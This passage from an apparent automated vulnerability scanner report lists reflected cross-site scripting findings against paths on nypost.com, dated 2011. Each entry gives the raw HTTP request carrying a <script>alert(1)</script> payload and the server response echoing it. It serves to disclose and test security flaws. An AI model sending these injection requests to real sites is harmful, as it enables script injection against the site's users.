Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.204. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65cda<script>alert(1)</script>376ac24913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 746
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.205. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c55<script>alert(1)</script>c4d72438687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.206. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload eb930<script>alert(1)</script>a951160820c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.207. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9813d<script>alert(1)</script>624dd600ebd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css</p>
...[SNIP]...

1.208. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>240343d24bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd</p>
...[SNIP]...

1.209. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9004e<script>alert(1)</script>dc2a72fb414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.210. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e704<script>alert(1)</script>cfdf90f07f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.211. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38a9c<script>alert(1)</script>e29f874c4ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.212. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de60c<script>alert(1)</script>24281a7b28a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css</p>
...[SNIP]...

1.213. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2df3<script>alert(1)</script>ac3fe82c465 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css</p>
...[SNIP]...

1.214. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f1102<script>alert(1)</script>3c9a06992d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2</p>
...[SNIP]...

1.215. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc016<script>alert(1)</script>2745160a2e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.216. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e041d<script>alert(1)</script>ef5daaa7b34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.217. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b723f<script>alert(1)</script>624ac6e556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css</p>
...[SNIP]...

1.218. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41d96<script>alert(1)</script>dceb556a181 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css</p>
...[SNIP]...

1.219. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67450<script>alert(1)</script>50498f63a55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css</p>
...[SNIP]...

1.220. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2b3c<script>alert(1)</script>890670991d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1</p>
...[SNIP]...

1.221. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cc6e<script>alert(1)</script>ae37078603d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
